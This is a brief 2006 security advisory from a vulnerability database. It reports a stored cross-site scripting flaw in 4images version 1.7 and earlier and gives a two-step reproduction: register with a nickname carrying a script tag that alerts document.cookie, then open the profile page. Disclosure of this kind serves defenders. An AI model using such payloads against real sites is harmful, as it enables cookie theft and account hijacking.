Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12351
HistoryApr 21, 2006 - 12:00 a.m.

4images <= 1.7 XSS

2006-04-2100:00:00
vulners.com
9

====================
Discovered by: Qex
Date: 14 April 2006

Steps:-

1- Register with this nickname:-
'><script>alert(document.cookie)</script>

2- Go to http://www.[SITE].com/[PATH]/member.php?action=showprofile&user_id=[ID]